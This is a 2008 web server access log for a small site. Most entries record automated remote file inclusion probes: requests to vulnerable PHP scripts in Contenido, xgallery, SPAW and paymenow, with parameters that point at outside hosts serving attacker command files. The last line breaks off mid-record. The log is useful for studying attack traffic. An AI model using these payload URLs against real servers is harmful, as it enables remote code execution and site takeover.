66.98.144.78 - - [20/Apr/2008:20:54:08 -0700] "GET /logs/access_080303.log/contenido/includes/include.client_subnav.php?cfg[path][contenido]=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.98.144.78 - - [20/Apr/2008:20:54:09 -0700] "GET /contenido/includes/include.client_subnav.php?cfg[path][contenido]=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.98.144.78 - - [20/Apr/2008:20:54:09 -0700] "GET /logs/contenido/includes/include.client_subnav.php?cfg[path][contenido]=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.98.144.78 - - [20/Apr/2008:20:54:21 -0700] "GET /logs/access_080303.log/contenido/includes/include.client_subnav.php?cfg[path][contenido]=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.98.144.78 - - [20/Apr/2008:20:54:21 -0700] "GET /contenido/includes/include.client_subnav.php?cfg[path][contenido]=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.98.144.78 - - [20/Apr/2008:20:54:22 -0700] "GET /logs/contenido/includes/include.client_subnav.php?cfg[path][contenido]=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
209.200.245.189 - - [20/Apr/2008:20:54:41 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
209.200.245.189 - - [20/Apr/2008:20:54:41 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
72.3.238.151 - - [20/Apr/2008:20:55:43 -0700] "GET /logs/access_071112.log/contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
207.58.138.166 - - [20/Apr/2008:20:56:19 -0700] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://energotechnology.com/templates/madeyourweb/css/temp1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
204.15.10.228 - - [20/Apr/2008:20:59:19 -0700] "GET /logs/access_080225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
72.29.70.163 - - [20/Apr/2008:21:01:55 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
72.29.70.163 - - [20/Apr/2008:21:01:55 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
128.241.54.4 - - [20/Apr/2008:21:04:51 -0700] "GET /plugins/payment/paymenow/paymenow.inc.php?config%5Broot_dir%5D=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
128.241.54.4 - - [20/Apr/2008:21:04:51 -0700] "GET /logs/plugins/payment/paymenow/paymenow.inc.php?config%5Broot_dir%5D=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
72.30.216.98 - - [20/Apr/2008:21:09:49 -0700] "GET /logs/access.log HTTP/1.0" 200 130281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
72.29.70.163 - - [20/Apr/2008:21:12:01 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 27